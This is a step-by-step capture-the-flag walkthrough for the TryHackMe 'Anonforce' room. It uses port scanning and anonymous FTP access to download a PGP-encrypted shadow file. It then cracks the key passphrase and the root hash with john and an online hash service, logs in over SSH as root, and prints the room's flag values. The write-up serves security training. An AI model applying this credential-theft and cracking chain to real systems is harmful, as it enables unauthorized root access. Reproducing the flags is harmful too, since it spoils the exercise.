Rom Link : https://tryhackme.com/r/room/bsidesgtanonforce
STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.231.249
FINDING
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
----------------------------------------------------------------------------------------------------------------
STEP2
ftp 10.10.231.249
anonymous
cd /home
dir
cd melodias
dir
get user.txt
cd noread
dir
get backup.pgp
get private.asc
FINDING
606083fd33beb1284fc51f411a706af8
NOTE
use https://hashes.com/en/decrypt/hash
606083fd33beb1284fc51f411a706af8 : 870016183
----------------------------------------------------------------------------------------------------------------
STEP3
need to open backup.pgp file and private.asc
private.asc holds the key to open backup.pgp
gpg2john private.asc anonfo
john anonfo
FINDING
xbox360
----------------------------------------------------------------------------------------------------------------
STEP4
gpg --decrypt backup.pgp -- open with password xbox360
FINDING
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.
bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
ftp:*:18120:0:99999:7:::
----------------------------------------------------------------------------------------------------------------
STEP5
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.
bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
decrypt by https://hashes.com/en/decrypt/hash
FINDING
root: hikari
----------------------------------------------------------------------------------------------------------------
STEP6
ssh [email protected] -s 22 -- with password hikari
whoami
root
cd /root
ls -la
cat root.txt
f706456440c7af4187810c31c6cebdce
----------------------------------------------------------------------------------------------------------------
|